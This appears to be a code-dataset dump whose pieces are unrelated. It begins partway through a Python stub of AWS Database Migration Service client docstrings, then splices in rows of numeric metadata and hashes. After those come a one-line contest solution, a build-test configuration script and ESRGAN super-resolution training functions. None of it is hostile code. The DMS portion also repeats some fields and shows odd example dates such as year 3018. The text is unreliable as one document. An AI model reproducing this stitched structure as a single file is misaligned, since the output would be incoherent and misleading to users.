The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
The public IP address of the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
The private IP address of the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The availability zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type ForceFailover: boolean
:param ForceFailover:
If this parameter is ``true`` , the reboot is conducted through a Multi-AZ failover. (If the instance isn\'t configured for Multi-AZ, then you can\'t specify ``true`` .)
:rtype: dict
:returns:
"""
pass
def refresh_schemas(self, EndpointArn: str, ReplicationInstanceArn: str) -> Dict:
"""
Populates the schema for the specified endpoint. This is an asynchronous operation and can take several minutes. You can check the status of this operation by calling the DescribeRefreshSchemasStatus operation.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/RefreshSchemas>`_
**Request Syntax**
::
response = client.refresh_schemas(
EndpointArn='string',
ReplicationInstanceArn='string'
)
**Response Syntax**
::
{
'RefreshSchemasStatus': {
'EndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'Status': 'successful'|'failed'|'refreshing',
'LastRefreshDate': datetime(2015, 1, 1),
'LastFailureMessage': 'string'
}
}
**Response Structure**
- *(dict) --*
- **RefreshSchemasStatus** *(dict) --*
The status of the refreshed schema.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **Status** *(string) --*
The status of the schema.
- **LastRefreshDate** *(datetime) --*
The date the schema was last refreshed.
- **LastFailureMessage** *(string) --*
The last failure message for the schema.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:rtype: dict
:returns:
"""
pass
def reload_tables(self, ReplicationTaskArn: str, TablesToReload: List, ReloadOption: str = None) -> Dict:
"""
Reloads the target database table with the source data.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ReloadTables>`_
**Request Syntax**
::
response = client.reload_tables(
ReplicationTaskArn='string',
TablesToReload=[
{
'SchemaName': 'string',
'TableName': 'string'
},
],
ReloadOption='data-reload'|'validate-only'
)
**Response Syntax**
::
{
'ReplicationTaskArn': 'string'
}
**Response Structure**
- *(dict) --*
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task.
:type TablesToReload: list
:param TablesToReload: **[REQUIRED]**
The name and schema of the table to be reloaded.
- *(dict) --*
- **SchemaName** *(string) --*
The schema name of the table to be reloaded.
- **TableName** *(string) --*
The table name of the table to be reloaded.
:type ReloadOption: string
:param ReloadOption:
Options for reload. Specify ``data-reload`` to reload the data and re-validate it if validation is enabled. Specify ``validate-only`` to re-validate the table. This option applies only when validation is enabled for the task.
Valid values: data-reload, validate-only
Default value is data-reload.
:rtype: dict
:returns:
"""
pass
def remove_tags_from_resource(self, ResourceArn: str, TagKeys: List) -> Dict:
"""
Removes metadata tags from a DMS resource.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/RemoveTagsFromResource>`_
**Request Syntax**
::
response = client.remove_tags_from_resource(
ResourceArn='string',
TagKeys=[
'string',
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ResourceArn: string
:param ResourceArn: **[REQUIRED]**
>The Amazon Resource Name (ARN) of the AWS DMS resource the tag is to be removed from.
:type TagKeys: list
:param TagKeys: **[REQUIRED]**
The tag key (name) of the tag to be removed.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def start_replication_task(self, ReplicationTaskArn: str, StartReplicationTaskType: str, CdcStartTime: datetime = None, CdcStartPosition: str = None, CdcStopPosition: str = None) -> Dict:
"""
Starts the replication task.
For more information about AWS DMS tasks, see `Working with Migration Tasks <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.html>`__ in the *AWS Database Migration Service User Guide.*
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/StartReplicationTask>`_
**Request Syntax**
::
response = client.start_replication_task(
ReplicationTaskArn='string',
StartReplicationTaskType='start-replication'|'resume-processing'|'reload-target',
CdcStartTime=datetime(2015, 1, 1),
CdcStartPosition='string',
CdcStopPosition='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The replication task started.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task to be started.
:type StartReplicationTaskType: string
:param StartReplicationTaskType: **[REQUIRED]**
The type of replication task.
:type CdcStartTime: datetime
:param CdcStartTime:
Indicates the start time for a change data capture (CDC) operation. Use either CdcStartTime or CdcStartPosition to specify when you want a CDC operation to start. Specifying both values results in an error.
Timestamp Example: --cdc-start-time “2018-03-08T12:12:12”
:type CdcStartPosition: string
:param CdcStartPosition:
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position \"checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93\"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
:type CdcStopPosition: string
:param CdcStopPosition:
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
:rtype: dict
:returns:
"""
pass
def start_replication_task_assessment(self, ReplicationTaskArn: str) -> Dict:
"""
Starts the replication task assessment for unsupported data types in the source database.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/StartReplicationTaskAssessment>`_
**Request Syntax**
::
response = client.start_replication_task_assessment(
ReplicationTaskArn='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The assessed replication task.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task.
:rtype: dict
:returns:
"""
pass
def stop_replication_task(self, ReplicationTaskArn: str) -> Dict:
"""
Stops the replication task.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/StopReplicationTask>`_
**Request Syntax**
::
response = client.stop_replication_task(
ReplicationTaskArn='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The replication task stopped.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name(ARN) of the replication task to be stopped.
:rtype: dict
:returns:
"""
pass
def test_connection(self, ReplicationInstanceArn: str, EndpointArn: str) -> Dict:
"""
Tests the connection between the replication instance and the endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/TestConnection>`_
**Request Syntax**
::
response = client.test_connection(
ReplicationInstanceArn='string',
EndpointArn='string'
)
**Response Syntax**
::
{
'Connection': {
'ReplicationInstanceArn': 'string',
'EndpointArn': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'EndpointIdentifier': 'string',
'ReplicationInstanceIdentifier': 'string'
}
}
**Response Structure**
- *(dict) --*
- **Connection** *(dict) --*
The connection tested.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **Status** *(string) --*
The connection status.
- **LastFailureMessage** *(string) --*
The error message when the connection last failed.
- **EndpointIdentifier** *(string) --*
The identifier of the endpoint. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:rtype: dict
:returns:
"""
pass
| 61.786486 | 836 | 0.559055 | 36,508 | 377,639 | 5.767804 | 0.032787 | 0.023636 | 0.020791 | 0.012865 | 0.906872 | 0.889757 | 0.876241 | 0.870837 | 0.8652 | 0.859439 | 0 | 0.013972 | 0.345213 | 377,639 | 6,111 | 837 | 61.796596 | 0.837544 | 0.891425 | 0 | 0.458716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.458716 | false | 0.477064 | 0.082569 | 0 | 0.550459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
d97e4bfcd7394ef338b784b2c291e3c2d4b3c1dd | 100 | py | Python | Boleh Code Python Nationals/L1-3 Herd Immunity.py | jaredliw/ppkomp-python-solutions | ecb92f3de27100f37595ef31fd46eccd984b84f7 | [
"MIT"
] | 1 | 2021-04-09T13:58:03.000Z | 2021-04-09T13:58:03.000Z | Boleh Code Python Nationals/L1-3 Herd Immunity.py | jaredliw/ppkomp-python-solutions | ecb92f3de27100f37595ef31fd46eccd984b84f7 | [
"MIT"
] | null | null | null | Boleh Code Python Nationals/L1-3 Herd Immunity.py | jaredliw/ppkomp-python-solutions | ecb92f3de27100f37595ef31fd46eccd984b84f7 | [
"MIT"
] | null | null | null | print("YES" if int(input()) / int(input()) >= 0.95 and int(input()) / int(input()) > 0.8 else "NO")
| 50 | 99 | 0.56 | 18 | 100 | 3.111111 | 0.611111 | 0.571429 | 0.392857 | 0.571429 | 0.607143 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0.15 | 100 | 1 | 100 | 100 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
d98e75400809cd153545e180e1edf58c01942265 | 2,334 | py | Python | tests/bamtests.py | markfinal/bam-qt | e71189dbbfc932d9ba46ead37630fba2b40a432a | [
"BSD-3-Clause"
] | 1 | 2015-09-19T11:40:03.000Z | 2015-09-19T11:40:03.000Z | tests/bamtests.py | markfinal/bam-qt | e71189dbbfc932d9ba46ead37630fba2b40a432a | [
"BSD-3-Clause"
] | 2 | 2018-05-20T07:34:03.000Z | 2018-05-20T14:19:24.000Z | tests/bamtests.py | markfinal/bam-qt | e71189dbbfc932d9ba46ead37630fba2b40a432a | [
"BSD-3-Clause"
] | null | null | null | from testconfigurations import TestSetup, visualc, visualc64, visualc32, mingw32, gcc, gcc64, gcc32, clang, clang32, clang64
def configure_repository():
configs = {}
#configs["Qt4Test1"] = TestSetup(win={"Native":[visualc64],"VSSolution":[visualc64],"MakeFile":[visualc64,mingw32]})
configs["Qt5Test1"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
configs["Qt5Test2"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
configs["Qt5Test3"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
configs["Qt5Test4"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
configs["Qt5WebBrowsingTest"] = TestSetup(win={"Native": [visualc64, visualc32, mingw32], "VSSolution": [visualc64, visualc32], "MakeFile": [visualc64, visualc32, mingw32]},
linux={"Native": [gcc64, gcc32], "MakeFile": [gcc64, gcc32]},
osx={"Native": [clang64, clang32], "MakeFile": [clang64, clang32], "Xcode": [clang64, clang32]})
return configs
| 106.090909 | 177 | 0.577978 | 191 | 2,334 | 7.057592 | 0.167539 | 0.21365 | 0.204006 | 0.120178 | 0.788576 | 0.788576 | 0.788576 | 0.788576 | 0.788576 | 0.788576 | 0 | 0.121092 | 0.246358 | 2,334 | 21 | 178 | 111.142857 | 0.645253 | 0.049272 | 0 | 0.526316 | 0 | 0 | 0.151037 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5c217dcfff1dd01425cbf3b5ff787512dadeeb66 | 3,751 | py | Python | modules/train.py | onordberg/multispectral-super-resolution | ca3c5f961bf015a5e54ed1d23ae11ec9d429ea8a | [
"MIT"
] | null | null | null | modules/train.py | onordberg/multispectral-super-resolution | ca3c5f961bf015a5e54ed1d23ae11ec9d429ea8a | [
"MIT"
] | null | null | null | modules/train.py | onordberg/multispectral-super-resolution | ca3c5f961bf015a5e54ed1d23ae11ec9d429ea8a | [
"MIT"
] | 1 | 2022-02-10T13:21:21.000Z | 2022-02-10T13:21:21.000Z | from modules.logging import *
def pretrain_esrgan(generator,
ds_train_dict,
epochs,
steps_per_epoch,
initial_epoch=0,
validate=False,
ds_val_dict=None,
val_steps=250,
model_name=None,
tag=None,
log_tensorboard=False,
tensorboard_logs_dir='logs/tb/',
save_models=False,
models_save_dir='logs/models',
save_weights_only=True,
log_train_images=False,
n_train_image_batches=1,
log_val_images=False,
n_val_image_batches=1):
logger = EsrganLogger(
model=generator,
model_name=model_name,
tag=tag,
pretrain_or_gan='pretrain',
log_tensorboard=log_tensorboard,
tensorboard_logs_dir=tensorboard_logs_dir,
save_models=save_models,
models_save_dir=models_save_dir,
save_weights_only=save_weights_only,
validate=validate,
val_steps=val_steps,
ds_val_dict=ds_val_dict, # dict of dataset(s)
log_train_images=log_train_images,
n_train_image_batches=n_train_image_batches,
ds_train_dict=ds_train_dict, # dict of dataset(s)
log_val_images=log_val_images,
n_val_image_batches=n_val_image_batches)
callbacks = logger.get_callbacks()
print('Callbacks:', callbacks)
ds_train = list(ds_train_dict.values())[0]
history = generator.fit(ds_train,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
initial_epoch=initial_epoch,
callbacks=callbacks)
return history
def gan_train_esrgan(esrgan_model,
ds_train_dict,
epochs,
steps_per_epoch,
initial_epoch=0,
validate=False,
ds_val_dict=None,
val_steps=250,
model_name=None,
tag=None,
log_tensorboard=False,
tensorboard_logs_dir='logs/tb/',
save_models=False,
models_save_dir='logs/models',
save_weights_only=True,
log_train_images=False,
n_train_image_batches=1,
log_val_images=False,
n_val_image_batches=1):
logger = EsrganLogger(
model=esrgan_model,
model_name=model_name,
tag=tag,
pretrain_or_gan='gan',
log_tensorboard=log_tensorboard,
tensorboard_logs_dir=tensorboard_logs_dir,
save_models=save_models,
models_save_dir=models_save_dir,
save_weights_only=save_weights_only,
validate=validate,
val_steps=val_steps,
ds_val_dict=ds_val_dict, # dict of dataset(s)
log_train_images=log_train_images,
n_train_image_batches=n_train_image_batches,
ds_train_dict=ds_train_dict, # dict of dataset(s)
log_val_images=log_val_images,
n_val_image_batches=n_val_image_batches)
callbacks = logger.get_callbacks()
print('Callbacks:', callbacks)
ds_train = list(ds_train_dict.values())[0]
history = esrgan_model.fit(ds_train,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
initial_epoch=initial_epoch,
callbacks=callbacks)
return history
